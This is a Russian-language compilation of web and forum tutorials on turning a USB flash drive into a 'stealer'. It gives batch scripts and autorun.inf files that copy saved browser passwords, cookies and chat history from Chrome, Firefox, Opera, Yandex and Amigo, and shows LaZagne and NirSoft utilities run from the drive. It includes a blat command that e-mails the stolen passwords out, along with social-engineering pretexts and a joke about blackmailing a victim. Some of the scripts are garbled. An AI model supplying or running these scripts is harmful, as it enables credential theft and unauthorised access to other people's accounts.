Как сделать флешку стиллер для Яндекс браузера?
Стиллер паролей для браузеров на Windows
Стиллер паролей для браузеров на Windows
Сегодня мы поговорим о том, как создать стиллер паролей для браузеров, которые работают под операционной системой Windows. Он будет работать быстро и точно, а самое главное, что на него не будут ругаться антивирусы. Писать стиллер паролей мы будет в обычном блокноте, в конце сохраним его как .bat. У нас уже есть статья, где мы говорили о создании шуточных вирусов – читать.
Стиллер паролей – определенный класс вирусов, функционал которых состоит в том, чтобы украсть сохраненные пароли с компьютера и отправить их “автору”.
Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.
- Не ругается антивирус;
- Скорость работы;
- Простота в доработке;
- Возможность мгновенного запуска;
- Портативность.
- Autorun не работает на Windows 8+;
- Постоянное созданиеудаление autorun.inf;
- Личное присутствие;
- Только для Windows.
Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов
Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.
Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.
Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.
Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.
Постоянное созданиеудаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.
Создаём стиллер паролей для браузеров
Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.
Создаём текстовый документ и пишем туда следующий код:
d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %
d0Opera
copy /y coockies.dat %
d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %
d0Mozilla
copy /y key3.db %
d0Mozilla
copy /y signons.sqlite %
d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %
d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
copy /y “%localappdata%GoogleChromeUser DataDefaultLogin Data” “%
d0/Google”
ATTRIB -R -A -S -H
attrib +h %
d0Mozilla
attrib +h %
d0Opera
attrib +h %
d0Google
del: Autorun.inf
Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.
Теперь нужно создать файл autorun.inf со следующей командой:
Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.
Открыть сохраненные пароли можно заменив краденые файлы cookies, базы данных и данные логина. Для удобства можно воспользоваться программой Password Web Views.
Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.
www.make-info.com
Флешка-воровка паролей. Как утащить (украсть) пароли через флешку. Флешка стиллер
Создадим свою флешку-воровку паролей
Для этого скачаем программу LaZagne:
( качаем файл Windows.zip для windows(да мой юный друг, мы все будет делать в windows)) разархивируем в папку (например:stel)
LaZagne эта программа служит для восстановоения паролей на компьютере или в браузере
Теперь закидываем эту папку на флешку.
И когда мы вставим флешку в компьютер жертвы нам надо открыть cmd и прописать:
f:stellaZagne.exe all -oA
f: «флешка» stel «путь» laZagne.exe «программа» all «все пароли что были на компьютере» -oA «сохранить пароли»
Создатся папка results и в ней два файла с паролями один в формате .json
Так же если хотите сдампить пароли только для браузеров:
f:stellaZagne.exe browsers -oA
Теперь давайте напишем батник для всех паролей (сохраните как password.bat):
F:/ stel/laZagne.exe all -oA
E:/stel/laZagne.exe all -oA
G:/stel/laZagne.exe all -oA
J:/stel/laZagne.exe all -oA
Батник для паролей браузера (password_browser.bat):
F:/ stel/laZagne.exe browsers -oA
E:/stel/laZagne.exe browsers -oA
G:/stel/laZagne.exe browsers -oA
J:/stel/laZagne.exe browsers -oA
Сoхраняете как autorun.inf
Теперь создаете батник в зависимости от того, какие пароли нужны и закидываете на флешку.
Авторан включает батник, батник запускает скрипты в зависимости от метки флешки и сохраняет результаты в results.
rselling.com
ВАЖНО Делаем простенький стилер сами
Кто просматривает этот контент: «Тема» (Всего пользователей: 0; Гостей: 1)
Давайте творчески подойдём к процессу и попробуем сделать из легальной программы, например Multi Password Recovery (MPR) программу для кражи всех паролей с компа (Стилер).
Вы сейчас скажите, ой-ай, чо херню несёшь, а херню-ли, рассказываю как сделать:
1) Первое что нам нужно это сам MPR. качаем по ссылке http://www.passrecovery.com/
установим MPR в отдельную папку. установили?
Blat это маленькая open source консольная програмулька под Windows, которая позволяет отправлять e-Mail по SMTP протоколу из командной строки.
3)Архив распаковываем в ту же папку с MPR:
Создаем файл 1.bat открываем с помощью Блокнота и вводим содержимое:
Изменяем данные на свои.
Это преобразование батника в exe с упаковкой нужных файлов, короче на подобие Джойнера, к сожалению она палится практически всеми АВ, ищем непалевный Джойнер на хак. сайтах !
Открываем её . в batch file вводим файл 1.bat .
В дереве visibility Ставим галку на второй чексбокс.
5)Заходим на вкладку include нажимаем на кнопку add и выбераем файлы
И нажимаем Compile. Открываем файл и смотрим почту.
Уважаемый пользователь
Может ещё что есть ?
Важно, чтобы программа поддерживала команды через батник:
mpr.exe /export — делает экспорт паролей;
ren *.mpf pass.mpf — переименовывает в pass.mpf
blat . exe — bоdу PassReg — to кому отправлять @ yandex . ru — attach pass . mpf — Строчка отправляет нам пароли pass.mpf !
Кстати такой функционал не проблема реализовать обычным батником без всякого MPR, вот например гугл-хром, хранит пароли в C:UsersSomeUserAppDataLocalGoogleChromeUser DataDefaultLogin Data
Тырити файл Login Data батником и всё, файлзилла хранит здесь:C:UsersВаше имяAppDataRoamingFileZillarecentservers.xml
Всё разумеется не зашифрованно, короче, не храните пароли в браузерах и файлзилла !
Данный код вытаскивает пароли из файлзилла, если есть нормальная защита, то должны получить запрет на доступ к папке Users, вот так:
Блин очередное головотяпство, во первых в файлзилла пароли могут-быть и здесь:sitemanager.xml
А во вторых не важная какая у вас защита пробить можно вводя без кавычик:“Pass User Host”.
Получаем пароль, никто даже не пискнул, ну OA конечно среагировал, задал алерт, ну и пох.:
Далее сохранаем эти пароли в txt и пересылаем на почту, в целом если у жертвы нет проактивки, или ламер может и сработать, существует ещё вероятность, что жертва случайно нажмёт на «Рсзрешить» !
Уважаемый пользователь
А вот теперь бонус, как стырить все пароли на флешку:
Идея вот в чём, приходите к красивой блондинке якобы проверить комп на вирусы, далее вставляет флешку с кашмарский антивирус, на флешке разумеется будет подготовленный софт, какой смотри ниже, короче когда флешка будет подключена, запуститься стиллер вместе со сканером кашмарского (Он запуститься для отвода глаз) и всё, все пароли у нас, потом заходим на почту блондинки и читаем её любовную переписку, а потом можно её шантажировать, если она откажется вас ещё пригласить.
Это типа способ знакомства такой, именно поэтому меня никто и не приглашает чинить комп, особенно блондинки, видно боятся, репутация понимаете.
Итак забыл самое главное сказать, как-же это всё сделать, а очень просто:
1. Создаем на флэшке две папки:
флэшка:prog
флэшка:proglog
2. В папку флэшка:prog заливаем все экзешники – утилиты, hstart.exe, KK.exe
3. В корне флешки создаем autorun.inf со следующим содержанием:
Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.
4. Создаем батник launch.bat:
Рассмотрим команды батника поподробнее:
echo off – запрет на вывод в окно CMD результатов выполнения
echo %computername%%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt
Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.
start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского
Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать «Проверить комп на вирусы», чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска «проверки на вирусы» достаточно просто, особенно если жертва вам доверяет.
Весь софт во вложении, пароль:111
Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!
Данная статья написана исключительно в ознакомительных целях.
Ее назначение — защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!
ru-sfera.org
Как сделать флешку стиллер для Яндекс браузера?
Батник — это обычный текстовый файл, содержащий наборы команд интерпретатора и имеющий расширение .bat или .cmd! (.cmd работают только в ОС семейства NT). Редактировать такие файлы можно при помощи блокнота «Или любого другого текстового редактора.
Пишем батник
Создавать,батник будем для второй ситуации (она немного сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:
chdir C:Program FilesQIPUsers
f:rar.exe a -r users -r > nul
copy users.rar g:adc > nul
del users.rar > nul
Весьма демократичная стоимость билетов на Григория Лепса предлагается здесь. справка для марафона москва;Шкафы купе, корпусная мебель на заказ здесь;Портативные зарядные устройство для телефона отзывы здесь;справка для марафона москва;Шкафы купе, корпусная мебель на заказ здесь;Портативные зарядные устройство для телефона отзывы здесь
где
©Echo off — скрывает визуальный процесс копирования.
C:Program FilesQIPUsers — папка, в которой находится история.
f:rar.exe а -г users > nul -запуск архиватора для ускорения копирования.
copy users.rar g:adc > nul — адрес куда копируем.
del users.rar > nul — удаляет созданный архив на жеском диске.
Не всегда бывает известна буква флеш-диска. В «таком случае прописываем несколько вариантов (один уж точно угадаем):
chdit C:Program FilesQIPUsers
f:rar.exe а -г users > nul
copy users.rar e:abc > nul
g:rar.exe a -r users > nul
copy users.rar g:abc > nul
h:rar.exe a -r users > nul
copy users.rar h:abc > nul
del users-rar > nul
Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расширение c .txt нa .bat. Это можно сделать в Total Commander’e.
Создаем автозапуск
Теперь надо сделать так, чтобы батник автоматически запускался с флешки при подключении к компьютеру. Для этого создаём новый текстовый документ и пишем в нём:
Сохраняем файл и переименовываем его на autorun.inf.
Делаем архив
Далее нам предстоит позаботится об архиваторе. QIP-история может быть большая. Чтобы процесс копирования происходил быстрее мы её заархивируем.
Из папки с WinRAR (по умолчанию C:Program FilesWinRAR берём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бросаем остальные три файла (xxx.bat, autorun.inf, rar.exe).
Все файлы скрываем от посторонних глаз (правой кнопкой мыши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку «жертве» и ждём результата.
Социальная инженерия
Не обязательно делать автозапуск. «Жертва» сама может запустить батник. Для этого надо воспользоваться социальной инженерией. Например, сообщаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстродействие и безопасность операционной системы. Устанавливать обновление нужно только с флешки. Можете сами придумать причину, по которой надо запустить наш батник. Всё зависит от вашей фантазии и смекалки.
Превращаем .bat в .exe
Для большей «безопасности» neperoним .bat в .ехе (вдруг»жертва» знакома с написанием батников). В этом нам поможет небольшая программка ExeScript v3.0.
Скачать можноэдесь: http://uploadbox.com/fMes/c8d5a60af9/ (размер 3.51. Мб). В окне программы жмём иконку с чистым листом и выбираем Batch file (bat) или File > New > Batch file (bat). В появившемся окне пишем наш «текст».
Теперь укажем для нашего ехе-шника подходящую иконку. В окне Properties щёлкаем на поле Custom Icon и выбираем заранееприготовленную иконку. Далее нажимаем F7 или Project > Build . Всё, ехе-шник готов.
www.helpwin.ru
Сегодня, мы быстро и вообще не напрягаясь сделаем из простой флешки cookie-стиллер, а потом расшифруем файлы cookie, чтобы узнать все пароли сохраненные в браузере.
Для начала, вы должны понимать, что такое файл cookie, это, в своем роде, такой зашифрованный текстовый документ в котором храниться основная информация о пользователе.
Но хватит теории, приступим.
Во первых, нам понадобиться флешка.
На ней мы создадим два текстовых файла:
первый — autorun.inf
второй — stealer.bat
не забудьте включить отображение расширений файлов, чтоб можно было изменить txt на inf и bat соответственно, это если вдруг кто не догадался)
дальше, в файле autorun мы пишем:
[AutoRun]Open=”stealer.bat”
[AutoRun]
Open=”stealer.bat”
всё, сохранили, закрыли. Это автозапуск нашего стиллера
В файле stealer.bat пишем:
d0Amigo
CD/D %APPDATA%OperaOpera
cls
copy /y wand.dat %
d0Opera
copy /y cookies.dat %
d0Opera
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %
d0Mozilla
copy /y key3.db %
d0Mozilla
copy /y signons.sqlite %
d0Mozilla
copy /y %AppData%MozillaFirefoxProfiles*.default %
d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
cls
copy /y «%localappdata%GoogleChromeUser DataDefaultLogin Data» «%
d0Google»
cd %localappdata%YandexYandexBrowserUser DataDefault
copy /y «%localappdata%YandexYandexBrowserUser DataDefaultLogin Data» «%
d0Yandex»
cd %localappdata%AmigoUser DataDefault
copy /y «%localappdata%AmigoUser DataDefaultLogin Data» «%
d0Amigo»
cls
ATTRIB -R -A -S -H
attrib +h %
d0Mozilla
attrib +h %
d0Opera
attrib +h %
d0Google
attrib +h %
d0Yandex
attrib +h %
d0Amigo
attrib +h %
d0search.bat
attrib +h %
d0autorun.inf
del: autorun.inf?
тоже сохраняем, закрываем. После чего заходим в свойства этих файлов и делаем их скрытыми. Стиллер готов.
Теперь, стоит остановиться на некоторых нюансах. А именно:
В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Поэтому придется придумать способ получить доступ к компьютеру и ручками запустить файл stealer.bat, благо процесс занимает очень мало времени, а придумать предлог сесть на минуту за чужой компьютер много ума не надо, ведь так? На всех предыдущих версиях винды, всё произойдет само как-только человек вставит флешку в usb порт.
Следующий нюанс, антивирус на эту манипуляцию никак не отреагирует, поэтому антивируса боятся не стоит, а вот фаервол всё это дело заблокирует на раз два. Тут важно понимать, что человек который установил и настроил фаервол, походу что-то где-то понимает и уж наверняка не будет хранить пароли в браузере, к такому персонажу нужен более тонкий подход, в следующих видео придумаем.
По нюансам всё. Теперь дальше, cookie то мы подрезали, чё с ними делать-то?
Рассказываю. Уже на своем компьютере, в идеале на виртуальной машине, удаляем нафиг свои куки. И вставляем на их место те которые у нас на флешке. Если вдруг кто не знает где хранятся cookie, вот подсказка:
Google Chrome:
C:UsersПользовательAppDataLocalGoogleChromeUser DataDefault (или Profile 1)файл «Cookies» без расширения
Opera:
C:UsersПользовательAppDataRoamingOpera SoftwareOpera Stableфайл «Cookies»
Mozilla Firefox:
C:UsersПользовательAppDataRoamingMozillaFirefoxProfilesqx1fqa6b.Default User файл «cookies.sqlite»
Internet Explorer 11:
C:UsersПользовательAppDataLocalMicrosoftWindowsINetCookies
C:UsersПользовательAppDataRoamingMicrosoftWindowsCookies
Скопировали. Теперь качаем программу WebBrowserPassView и запускаем, всё. Видим на каких сайтах какие учётные записи и какие там пароли и используем их во благо и в целях безопасности)
gerki.pw
Актуально Улучшенный стиллер (батник)
Пользователь
Пользователь
set n = 0
:lol
if exist «%
d0Mozilla%n%» ( set /a n=n+1
goto:lol ) else ( md %
d0Mozilla%n%
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %
d0Mozilla
copy /y key3.db %
d0Mozilla
copy /y signons.sqlite %
d0Mozilla )
set /a n = 0
:lol2
if exist «%
d0Google%n%» ( set /a n=n+1
goto:lol2 ) else (md %
d0Google%n%
cd %localappdata%GoogleChromeUser DataDefault
copy /y «%localappdata%GoogleChromeUser DataDefaultLogin Data» «%
set /a n = 0
:lol3
if exist «%
d0Opera%n%» ( set /a n=n+1
goto:lol3 ) else (md %
d0Opera%n%
CD/D %APPDATA%OperaOpera
copy /y wand.dat %
d0Opera%n%
copy /y cookies.dat %
d0Opera%n%
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %
d0Mozilla%n%
copy /y key3.db %
d0Mozilla%n%
copy /y signons.sqlite %
d0Mozilla%n%
copy /y AppData%MozillaFirefoxProfiles*.default %
ATTRIB -R -A -S -H
attrib +h %
d0Mozilla
attrib +h %
d0Opera
attrib +h %
Пользователь
Пользователь
Пользователь
Пользователь
set n = 0
:lol
if exist «%
d0Mozilla%n%» ( set /a n=n+1
goto:lol ) else ( md %
d0Mozilla%n%
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %
d0Mozilla
copy /y key3.db %
d0Mozilla
copy /y signons.sqlite %
d0Mozilla )
set /a n = 0
:lol2
if exist «%
d0Yandex%n%» ( set /a n=n+1
goto:lol2 ) else (md %
d0Yandex%n%
cd %localappdata%YandexYandexBrowserUser DataDefault
copy /y «%localappdata%YandexYandexBrowserUser DataDefaultLogin Data» «%
set /a n = 0
:lol3
if exist «%
d0Opera%n%» ( set /a n=n+1
goto:lol3 ) else (md %
d0Opera%n%
CD/D %APPDATA%OperaOpera
copy /y wand.dat %
d0Opera%n%
copy /y cookies.dat %
d0Opera%n%
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %
d0Mozilla%n%
copy /y key3.db %
d0Mozilla%n%
copy /y signons.sqlite %
d0Mozilla%n%
copy /y AppData%MozillaFirefoxProfiles*.default %
ATTRIB -R -A -S -H
attrib +h %
d0Mozilla
attrib +h %
d0Opera
attrib +h %
на оперу не пашит. хром на яндекс заменил , но за прогу тоже спасибки , с помошью нее пути указываю, оперу шя потделаю чтоб работала , а мазылы нет, ну тоже устоновлю , сделаю , на все браузера ребятки.
и ребта объясните почему в lol3 присутствует ссыла на мозилу, не пойму ведь эта команда оперы, и в хроме не прописаны ссылки на чтоб копировать куки с яндекса, толи код недоделан, толи так надо
бля обида в том что опер много есть стабл туда путь RoamingOpera SoftwareOpera Stable токой, и на каждую надо писать!!
dark-time.life